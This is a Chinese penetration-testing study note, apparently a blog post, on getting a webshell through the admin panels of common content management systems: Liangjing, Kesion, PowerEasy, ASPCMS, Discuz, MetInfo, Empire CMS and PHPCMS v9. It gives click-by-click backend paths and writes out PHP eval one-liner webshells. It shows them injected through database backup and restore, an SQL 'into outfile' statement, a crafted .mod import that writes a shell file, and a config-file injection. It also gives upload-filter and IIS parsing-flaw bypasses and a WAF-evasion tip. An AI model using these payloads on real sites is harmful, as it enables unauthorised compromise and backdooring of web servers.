常见cms

良精、科讯、动易、aspcms、dz

米拓cms、phpcms2008、帝国cms、phpv9

phpweb、dedecms

良精

方法:

1、数据库备份拿shell

上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式

2、双文件上传

3、配置插马

4、修改文件上传类型直接上传

科讯(用IE)

/admin/admin.asp   后台路径

1、利用解析漏洞

2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)

内容——图片添加——上传时改为aaspsp

设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下

动易(学校,简单的企业)

在网站配置中插马——连接inc/config.asp文件

数据库备份

双文件上传

aspcms

界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话

拓展功能——幻灯片设置——插马

dz

uckey或利用插件上传(常见的网站discuz x2.5)

后台 admin.php或cu_server

站长——ucenter设置(通过配置插马,闭合拿shell)

站长——数据库备份(或短文件漏洞)

米拓cms

metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

后台         admin/index.php (上传图片马 包含文件)

后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)

权限要求很高

帝国cms

empircms-v6.6

127.0.0.1/e/install

后台:127.0.0.1/e/admin/index.php

后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

后台——界面——模板风格——详情列表——search——编辑插马

后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

后台——内容——专题         phpv9低权限拿shell

phpweb

dedecmd

渗透测试学习 二十三、常见cms拿shell的更多相关文章

  1. 渗透测试学习 二十二、getshell总结

    大纲   管理员权限拿shell 普通权限拿shell 常见cms拿shell 进后台主要是可以对网站前台的内容,样式等做操作,要改脚本的内容的权限只有在webshell的权限下才可以(某些情况除外) ...

  2. 渗透测试学习 二十九、kali安装,信息搜集,服务器扫描

    kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由 ...

  3. 渗透测试学习 二十、 其他漏洞汇总之PHP相关漏洞

    大纲: PHP相关漏洞 JSP相关漏洞 其他漏洞汇总 PHP相关漏洞 文件包含漏洞 php://input等伪协议利用 代码执行漏洞 变量覆盖漏洞 文件包含漏洞 程序开发人员一般会把重复使用的函数写到 ...

  4. 渗透测试学习 二、Windows基础

    系统目录  服务  端口  注册表  黑客常用DOS命令(在拿到shell时会用到) 一.  系统目录 Windows目录  系统的安装目录 System32àconfigàSAM文件  是用户密码的 ...

  5. 渗透测试学习 二十八、WAF绕过详解

    大纲: WAF防护原理讲解 目录扫描绕过WAF 手工注入绕过WAF sqlmap绕过WAF 编写salmap绕过WAF 过WAF一句话编写讲解 菜刀连接绕过WAF webshell上传绕过WAF 提权 ...

  6. 渗透测试学习 二十一、 JSP相关漏洞

    大纲 ST2漏洞  (Struts2) 反序列漏洞              网站容器,中间键 其他漏洞 Struts2漏洞 简介: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相 ...

  7. 渗透测试学习 十三、 SQLmap使用详解

    SQLmap介绍 sqlmap是一个由python语言编写的开源的渗透测试工具,它主要是检测SQL注入漏洞,是一款功能强大的SQL漏洞检测利用工具. 他可以检测的数据库有:access.msSQL.M ...

  8. Kali Linux Web 渗透测试视频教程— 第十三课-密码破解

    Kali Linux Web 渗透测试— 第十三课-密码破解 文/玄魂 目录 Kali Linux Web 渗透测试— 第十三课-密码破解............................... ...

  9. 【渗透测试学习平台】 web for pentester -2.SQL注入

    Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/e ...

随机推荐

  1. Linux shell--基础指令

    Linux shell--基础指令 浏览Linux文件系统 Linux中最基础也是最必要的一条指令 cd destination cd命令可接受单个参数destination,用以指定想切换到的目录名 ...

  2. 20个常用的JavaScript字符串方法

    摘要: 玩转JS字符串. 原文:JS 前20个常用字符串方法及使用方式 译者:前端小智 Fundebug经授权转载,版权归原作者所有. 本文主要介绍一些最常用的JS字符串函数. 1. charAt(x ...

  3. Linux下使用 github+hexo 搭建个人博客02-hexo部署到Github Pages

    之前的这篇文章<Linux下使用 github+hexo 搭建个人博客01-hexo搭建>,相信大家都知道怎么搭建 hexo ,怎么切换主题,并且完成了一篇博文的创建,以及 MarkDow ...

  4. 27-限制容器的 Block IO

    Block IO 是另一种可以限制容器使用的资源.Block IO 指的是磁盘的读写,docker 可通过设置权重.限制 bps 和 iops 的方式控制容器读写磁盘的带宽,下面分别讨论. 注:目前 ...

  5. 如何在mac版本的python里安装pip

    mac里面python自带easy_install,在终端里面执行sudo easy_install pip.运行完可以用pip help测试一下是否安装成功,成功安装后,直接pip install ...

  6. 程序运行时间测试 - 使用系统函数 getrusage 获取程序运行时间

    https://github.com/yaowenxu/Workplace/blob/master/timer/getrusagetimer.c 关键结构体: struct rusage { stru ...

  7. PyCharm关闭按两次Shift进入搜索框的功能

    1.按Ctrl + Shift + A 弹出搜索框 2.在弹出的搜索框内输入registry(如果汉化了输入“注册”),回车 3.在弹出的窗口中,往下找到“ide.suppress.double.cl ...

  8. 01-Node.js学习笔记-模块成员的导出导入

    什么是Node.js Node.js是一个让javascript运行在服务端的开发平台: Node.js能做什么? 1.基于社交网络的大规模web应用: 2.命令行工具 3.交互式终端程序 4.带有图 ...

  9. 201871010106-丁宣元 《面向对象程序设计(java)》第十二周学习总结

    201871010106-丁宣元 <面向对象程序设计(java)>第十二周学习总结 正文开头: 项目 内容 这个作业属于哪个课程 https://home.cnblogs.com/u/nw ...

  10. TeamyinyinFish-凡事遇则立

    小组github地址: https://github.com/TeamyinyinFish 1.项目的总结反思 阿尔法迭代的时候我们只是理想的随意的选择了一个项目并且认为非常简单. 在第二轮迭代的时候 ...